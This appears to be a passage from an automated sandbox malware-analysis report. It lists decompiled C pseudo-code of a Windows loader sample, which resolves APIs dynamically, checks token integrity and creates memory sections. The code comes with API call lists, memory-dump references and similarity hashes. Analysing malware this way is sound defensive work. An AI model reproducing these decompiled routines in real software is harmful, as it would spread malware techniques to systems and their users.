                            0x00f14e58
                            0x00f14e74
                            0x00f14e74
                            0x00f14e78
                            0x00f14e78
                            0x00f14e7d
                            0x00f14e81
                            0x00f14e87
                            0x00f14e88
                            0x00f14e8f
                            0x00f14e95

                            APIs
                            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00F14E01
                            • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00F14E21
                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00F14E31
                            • CloseHandle.KERNEL32(00000000), ref: 00F14E81
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00F14E54
                            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00F14E5C
                            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00F14E6C
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                            • String ID:
                            • API String ID: 1295030180-0
                            • Opcode ID: 3939105fe12e6adec501af651ebef2a30317710a645b4c8c03c3ea608d703c18
                            • Instruction ID: 8e33ab6ae4c6d7df8833acb2542c5615dcfa3332fb3ffd9b1a148b765c40b305
                            • Opcode Fuzzy Hash: 3939105fe12e6adec501af651ebef2a30317710a645b4c8c03c3ea608d703c18
                            • Instruction Fuzzy Hash: A4213975D0021DFFEB009FA4DC44EEEBBB9FB48314F1040A5E911A6161C7719A45EB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F16FB2, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00F14176: IUnknown_QueryService.SHLWAPI(00000000,?,057F89D4,00F16FE2,?,?,?,?,?,?,?,?,?,?,?,00F16FE2), ref: 00F14242
                              • Part of subcall function 00F15F72: IUnknown_QueryInterface_Proxy.RPCRT4(?,?,?), ref: 00F15FAF
                              • Part of subcall function 00F15F72: IUnknown_QueryInterface_Proxy.RPCRT4(?,?,?), ref: 00F15FE0
                            • SysAllocString.OLEAUT32(00000000), ref: 00F1700E
                            • SysAllocString.OLEAUT32(?), ref: 00F17022
                            • SysAllocString.OLEAUT32(00000000), ref: 00F17034
                            • SysFreeString.OLEAUT32(00000000), ref: 00F17098
                            • SysFreeString.OLEAUT32(00000000), ref: 00F170A7
                            • SysFreeString.OLEAUT32(00000000), ref: 00F170B2
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                            • String ID:
                            • API String ID: 2831207796-0
                            • Opcode ID: 38b1cf6d52715183eb3ea1aba99287e3ef82fa0add2359c566450aec4bda876f
                            • Instruction ID: 2e3d0c9447d3748f41b72fbf8eb74bf0ec51eec0930a2891d9dade8c84f3532a
                            • Opcode Fuzzy Hash: 38b1cf6d52715183eb3ea1aba99287e3ef82fa0add2359c566450aec4bda876f
                            • Instruction Fuzzy Hash: F9314E32D00609EFDB01EFB8C844AEEB7B6AF49310F158465ED14EB120DB75AD46DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F16CE5, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F16CE5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00F155DC(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xf1d2b8; // 0x48da5a8
					_t48 = GetModuleHandleA(_t23 + 0xf1e11a);
					_t26 =  *0xf1d2b8; // 0x48da5a8
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t26 + 0xf1e782);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00F16DFA(_t54);
					} else {
						_t30 =  *0xf1d2b8; // 0x48da5a8
						_t32 = GetProcAddress(_t48, _t30 + 0xf1e76f);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xf1d2b8; // 0x48da5a8
							_t35 = GetProcAddress(_t48, _t33 + 0xf1e4ce);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xf1d2b8; // 0x48da5a8
								_t38 = GetProcAddress(_t48, _t36 + 0xf1e406);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xf1d2b8; // 0x48da5a8
									_t41 = GetProcAddress(_t48, _t39 + 0xf1e792);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00F17562(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                            0x00f16cf4
                            0x00f16cf8
                            0x00f16dba
                            0x00f16cfe
                            0x00f16cfe
                            0x00f16d16
                            0x00f16d18
                            0x00f16d25
                            0x00f16d2c
                            0x00f16d30
                            0x00f16d33
                            0x00f16db2
                            0x00f16db3
                            0x00f16d35
                            0x00f16d35
                            0x00f16d42
                            0x00f16d46
                            0x00f16d49
                            0x00000000
                            0x00f16d4b
                            0x00f16d4b
                            0x00f16d58
                            0x00f16d5c
                            0x00f16d5f
                            0x00000000
                            0x00f16d61
                            0x00f16d61
                            0x00f16d6e
                            0x00f16d72
                            0x00f16d75
                            0x00000000
                            0x00f16d77
                            0x00f16d77
                            0x00f16d84
                            0x00f16d88
                            0x00f16d8b
                            0x00000000
                            0x00f16d8d
                            0x00f16d93
                            0x00f16d98
                            0x00f16d9f
                            0x00f16da6
                            0x00f16da9
                            0x00000000
                            0x00f16dab
                            0x00f16dae
                            0x00f16dae
                            0x00f16da9
                            0x00f16d8b
                            0x00f16d75
                            0x00f16d5f
                            0x00f16d49
                            0x00f16d33
                            0x00f16dc8

                            APIs
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • GetModuleHandleA.KERNEL32(?,00000020,?,74183966,00000000,?,?,?,00F187BD,?,?,?,?,00000000,00000000), ref: 00F16D0A
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F16D2C
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F16D42
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F16D58
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F16D6E
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F16D84
                              • Part of subcall function 00F17562: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,00F16DA4), ref: 00F175BF
                              • Part of subcall function 00F17562: memset.NTDLL ref: 00F175E1
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                            • String ID:
                            • API String ID: 3012371009-0
                            • Opcode ID: a3f0d14cb5a9636651c732bcf40ca6862c2ed9198c64c959332552b96131c989
                            • Instruction ID: d869293507ed6391cf46f5843f1590518ddc72b75e2b8d5abc4adaff65484aa2
                            • Opcode Fuzzy Hash: a3f0d14cb5a9636651c732bcf40ca6862c2ed9198c64c959332552b96131c989
                            • Instruction Fuzzy Hash: 77219FB260020AEFDB50DF68DC44EFA77FCEB087507058165E809C7225D774E985AB70
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F148E5, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 88%
                            			E00F148E5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0xf1d36c);
					_t91 = 0x80000002;
					L6:
					_t59 = E00F165F6( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E00F1691B(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E00F16DFA(_a8);
						goto L29;
					}
					_t64 =  *0xf1d2b0; // 0x57f9b78
					_t65 = E00F165F6(_t64,  *((intOrPtr*)(_t64 + 0xc)));
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d00f1c0, executed
						_t67 = E00F16E41(_t97,  *_t33, _t91, _a8,  *0xf1d364,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0xf1d2b8; // 0x48da5a8
							if(_t98 == 0) {
								_t69 = _t68 + 0xf1ea23;
							} else {
								_t69 = _t68 + 0xf1e8cb;
							}
							if(E00F15D44(_t69,  *0xf1d364,  *0xf1d368,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0xf1d2b8; // 0x48da5a8
									_t73 = E00F165F6(_t71 + 0xf1e83e, _t71 + 0xf1e83e);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d00f1c0
										E00F14FA0( *_t47, _t91, _a8,  *0xf1d368, _a24);
										_t49 = _t101 + 0x10; // 0x3d00f1c0
										E00F14FA0( *_t49, _t91, _t99,  *0xf1d360, _a16);
										E00F16DFA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d00f1c0
									E00F14FA0( *_t40, _t91, _a8,  *0xf1d368, _a24);
									_t43 = _t101 + 0x10; // 0x3d00f1c0, executed
									E00F14FA0( *_t43, _t91, _a8,  *0xf1d360, _a16); // executed
								}
								if( *_t101 != 0) {
									E00F16DFA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d00f1c0, executed
					_t81 = E00F15607( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d00f1c0
							E00F16E41(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E00F16DFA(_t100);
						_t98 = _a16;
					}
					E00F16DFA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E00F1AA99(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0xf1d36c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

























                            0x00f148e5
                            0x00f148ee
                            0x00f148f5
                            0x00f148fa
                            0x00f14967
                            0x00f1496d
                            0x00f14972
                            0x00f14979
                            0x00f14980
                            0x00f14983
                            0x00f14aee
                            0x00f14af5
                            0x00f14af5
                            0x00f14afa
                            0x00f14afc
                            0x00f14afc
                            0x00f14b05
                            0x00f14b05
                            0x00f14989
                            0x00f1498e
                            0x00f14995
                            0x00f14ae4
                            0x00f14ae7
                            0x00000000
                            0x00f14ae7
                            0x00f1499b
                            0x00f149a3
                            0x00f149aa
                            0x00f149ad
                            0x00f149f6
                            0x00f149f6
                            0x00f14a09
                            0x00f14a0c
                            0x00f14a13
                            0x00f14a1b
                            0x00f14a20
                            0x00f14a2a
                            0x00f14a22
                            0x00f14a22
                            0x00f14a22
                            0x00f14a4c
                            0x00f14a54
                            0x00f14a82
                            0x00f14a8e
                            0x00f14a93
                            0x00f14a97
                            0x00f14ac9
                            0x00f14a99
                            0x00f14aa6
                            0x00f14aa9
                            0x00f14ab9
                            0x00f14abc
                            0x00f14ac2
                            0x00f14ac2
                            0x00f14a56
                            0x00f14a63
                            0x00f14a66
                            0x00f14a78
                            0x00f14a7b
                            0x00f14a7b
                            0x00f14ad3
                            0x00f14adf
                            0x00f14ad5
                            0x00f14ad8
                            0x00f14ad8
                            0x00f14ad3
                            0x00f14a4c
                            0x00000000
                            0x00f14a13
                            0x00f149bc
                            0x00f149bf
                            0x00f149c6
                            0x00f149cc
                            0x00f149cf
                            0x00f149d1
                            0x00f149dd
                            0x00f149e0
                            0x00f149e0
                            0x00f149e6
                            0x00f149eb
                            0x00f149eb
                            0x00f149f1
                            0x00000000
                            0x00f149f1
                            0x00f148ff
                            0x00000000
                            0x00f14926
                            0x00f14926
                            0x00f14932
                            0x00f14945
                            0x00f1494b
                            0x00f14953
                            0x00000000
                            0x00f14953

                            APIs
                            • StrChrA.SHLWAPI(00F16096,0000005F,00000000,00000000,00000104), ref: 00F14918
                            • lstrcpy.KERNEL32(?,?), ref: 00F14945
                              • Part of subcall function 00F165F6: lstrlen.KERNEL32(?,00000000,057F9B78,00000000,00F125B8,?,69B25F44,?,?,?,?,69B25F44,00000005,00F1D00C,?,?), ref: 00F165FD
                              • Part of subcall function 00F165F6: mbstowcs.NTDLL ref: 00F16626
                              • Part of subcall function 00F165F6: memset.NTDLL ref: 00F16638
                              • Part of subcall function 00F14FA0: lstrlenW.KERNEL32(?,?,?,00F14AAE,3D00F1C0,80000002,00F16096,00F1A6E1,?,?,00F1A6E1,?,3D00F1C0,80000002,00F16096,?), ref: 00F14FC5
                              • Part of subcall function 00F16DFA: RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            • lstrcpy.KERNEL32(?,00000000), ref: 00F14967
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                            • String ID: ($\
                            • API String ID: 3924217599-1512714803
                            • Opcode ID: fb1c2dd5fbd1cc073be1ee21b21272fe0baf7283bafde02b6c9c2d1747599e92
                            • Instruction ID: 8410f1221bc1f4df88065b61e0a0064bea62e6c438a9c7c6d657db9c8eb51ee8
                            • Opcode Fuzzy Hash: fb1c2dd5fbd1cc073be1ee21b21272fe0baf7283bafde02b6c9c2d1747599e92
                            • Instruction Fuzzy Hash: 4B516B7250020AEFDF119F60DC41EEA7BB9FF48320F118164F92592161D739EAA5FB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F1587D, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 57%
                            			E00F1587D(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E00F16DCB();
				if(_t21 != 0) {
					_t59 =  *0xf1d294; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0xf1d294 = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0xf1d12c(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E00F15203( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0xf1d2b8; // 0x48da5a8
					if( *0xf1d294 > 5) {
						_t27 = _t26 + 0xf1e5cd;
					} else {
						_t27 = _t26 + 0xf1e9d9;
					}
					E00F13D42(_t27, _t27);
					_t31 = E00F15C7F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0xf1d2a8 =  *0xf1d2a8 ^ 0x81bbe65d;
						_t32 = E00F155DC(0x60);
						__eflags = _t32;
						 *0xf1d35c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0xf1d35c; // 0x57f95b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0xf1d35c; // 0x57f95b0
							 *_t51 = 0xf1e823;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0xf1d270, 0, 0x43);
							__eflags = _t36;
							 *0xf1d300 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0xf1d294; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0xf1d2b8; // 0x48da5a8
								_t55 = _t58 + 0xf1e55a;
								wsprintfA(_t36, _t58 + 0xf1e55a, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xf1c2a7);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E00F1A303( ~_v8 &  *0xf1d2a8, 0xf1d00c); // executed
								_t42 = E00F1294D(0, _t55, _t63, 0xf1d00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E00F12551();
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E00F15038(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E00F18BA7(__eflags,  &(_t67[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0xf1d128(); // executed
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E00F162E1(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                            0x00f1587d
                            0x00f15887
                            0x00f1588a
                            0x00f1588d
                            0x00f15890
                            0x00f15897
                            0x00f15899
                            0x00f158a5
                            0x00f158a7
                            0x00f158a7
                            0x00f158b0
                            0x00f158b8
                            0x00f158bb
                            0x00f158d5
                            0x00f158e1
                            0x00f158e3
                            0x00f158e8
                            0x00f158f2
                            0x00f158ea
                            0x00f158ea
                            0x00f158ea
                            0x00f158f9
                            0x00f15906
                            0x00f1590d
                            0x00f15912
                            0x00f15912
                            0x00f1591b
                            0x00f1591e
                            0x00f15944
                            0x00f15950
                            0x00f15955
                            0x00f15957
                            0x00f1595c
                            0x00f15988
                            0x00f1598a
                            0x00f1595e
                            0x00f15962
                            0x00f15967
                            0x00f1596c
                            0x00f15973
                            0x00f15979
                            0x00f1597e
                            0x00f15984
                            0x00f1598b
                            0x00f1598d
                            0x00f1598f
                            0x00f1599e
                            0x00f159a4
                            0x00f159a6
                            0x00f159ab
                            0x00f159db
                            0x00f159dd
                            0x00f159ad
                            0x00f159ad
                            0x00f159b3
                            0x00f159c0
                            0x00f159c6
                            0x00f159ce
                            0x00f159d7
                            0x00f159de
                            0x00f159e0
                            0x00f159e2
                            0x00f159e9
                            0x00f159f6
                            0x00f159fb
                            0x00f15a00
                            0x00f15a02
                            0x00f15a04
                            0x00000000
                            0x00000000
                            0x00f15a06
                            0x00f15a0b
                            0x00f15a0d
                            0x00f15a14
                            0x00f15a18
                            0x00f15a1b
                            0x00f15a30
                            0x00f15a34
                            0x00f15a39
                            0x00000000
                            0x00f15a39
                            0x00f15a1d
                            0x00f15a1f
                            0x00000000
                            0x00000000
                            0x00f15a2a
                            0x00f15a2c
                            0x00f15a2e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f15a2e
                            0x00f15a11
                            0x00f15a11
                            0x00f159e2
                            0x00f15920
                            0x00f15920
                            0x00f15925
                            0x00f15a3b
                            0x00f15a40
                            0x00f15a48
                            0x00f15a48
                            0x00000000
                            0x00f15a40
                            0x00f1592b
                            0x00f1592e
                            0x00f15938
                            0x00f1593f
                            0x00000000
                            0x00f15a50
                            0x00f15a50
                            0x00f15a53
                            0x00f15a57
                            0x00f15a57

                            APIs
                              • Part of subcall function 00F16DCB: GetModuleHandleA.KERNEL32(?,00000000,00F15895,00000001), ref: 00F16DDA
                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00F15912
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • memset.NTDLL ref: 00F15962
                            • RtlInitializeCriticalSection.NTDLL(057F9570), ref: 00F15973
                              • Part of subcall function 00F18BA7: memset.NTDLL ref: 00F18BC1
                              • Part of subcall function 00F18BA7: lstrlenW.KERNEL32(00000000,?,00000005,?,00000000), ref: 00F18C07
                              • Part of subcall function 00F18BA7: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 00F18C12
                            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00F1599E
                            • wsprintfA.USER32 ref: 00F159CE
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                            • String ID:
                            • API String ID: 4246211962-0
                            • Opcode ID: af6db23e624557b69a9b0d680891c031d2fe793debef701876dfb08d8f00ad10
                            • Instruction ID: 08e4d8e551032c2a31069ad223719520da18385f5b907488c22d8f7597dfccbe
                            • Opcode Fuzzy Hash: af6db23e624557b69a9b0d680891c031d2fe793debef701876dfb08d8f00ad10
                            • Instruction Fuzzy Hash: 08512571E90A1DEBDB10ABA4DC85BEE33B9AF44B24F158526F101D7151E7B8C9C0BB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F14B5B, Relevance: 7.6, APIs: 5, Instructions: 95synchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F14B5B(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0xf1d2a8; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0xf1d2b8; // 0x48da5a8
				_t25 = 0;
				_t30 = E00F1760A(_t8 + 0xf1e876, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xf1d2e4, 1, 0, _t30);
					E00F16DFA(_t30);
				}
				_t12 =  *0xf1d294; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t14 = E00F187A1(_t32, _t26); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E00F13309(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E00F162E1(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}


















                            0x00f14b5c
                            0x00f14b63
                            0x00f14b6d
                            0x00f14b71
                            0x00f14b86
                            0x00f14b8d
                            0x00f14b91
                            0x00f14ba3
                            0x00f14ba5
                            0x00f14ba5
                            0x00f14baa
                            0x00f14bb1
                            0x00f14c06
                            0x00f14c06
                            0x00f14c0c
                            0x00f14c0e
                            0x00f14c0e
                            0x00f14c13
                            0x00f14c18
                            0x00f14c1c
                            0x00f14c2e
                            0x00f14c2e
                            0x00f14c32
                            0x00f14c38
                            0x00f14c38
                            0x00000000
                            0x00f14bc1
                            0x00f14bc1
                            0x00f14bc8
                            0x00000000
                            0x00000000
                            0x00f14bcf
                            0x00f14bd7
                            0x00f14bd9
                            0x00f14bdd
                            0x00f14bdd
                            0x00f14be5
                            0x00f14bea
                            0x00f14bee
                            0x00f14bf2
                            0x00f14c47
                            0x00f14c4d
                            0x00f14c4d
                            0x00f14c00
                            0x00f14c04
                            0x00f14c3b
                            0x00f14c3d
                            0x00f14c40
                            0x00f14c40
                            0x00000000
                            0x00f14c3d
                            0x00f14c04
                            0x00000000
                            0x00f14bee

                            APIs
                              • Part of subcall function 00F1760A: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,057F9B78,00000000,?,?,69B25F44,00000005,00F1D00C,?,?,?), ref: 00F17640
                              • Part of subcall function 00F1760A: lstrcpy.KERNEL32(00000000,00000000), ref: 00F17664
                              • Part of subcall function 00F1760A: lstrcat.KERNEL32(00000000,00000000), ref: 00F1766C
                            • CreateEventA.KERNEL32(00F1D2E4,00000001,00000000,00000000,?,00000001,00000000,?,?,00000000,?,00F160B5,?,?,?), ref: 00F14B9C
                              • Part of subcall function 00F16DFA: RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            • StrChrW.SHLWAPI(00F160B5,00000020,?,00000001,00000000,?,?,00000000,?,00F160B5,?,?,?), ref: 00F14BCF
                            • WaitForSingleObject.KERNEL32(00000000,00004E20,00F160B5,00000000,00000000,?,00000000,?,00F160B5,?,?,?), ref: 00F14BFA
                            • WaitForSingleObject.KERNEL32(00000000,00004E20,?,00000001,00000000,?,?,00000000,?,00F160B5,?,?,?), ref: 00F14C28
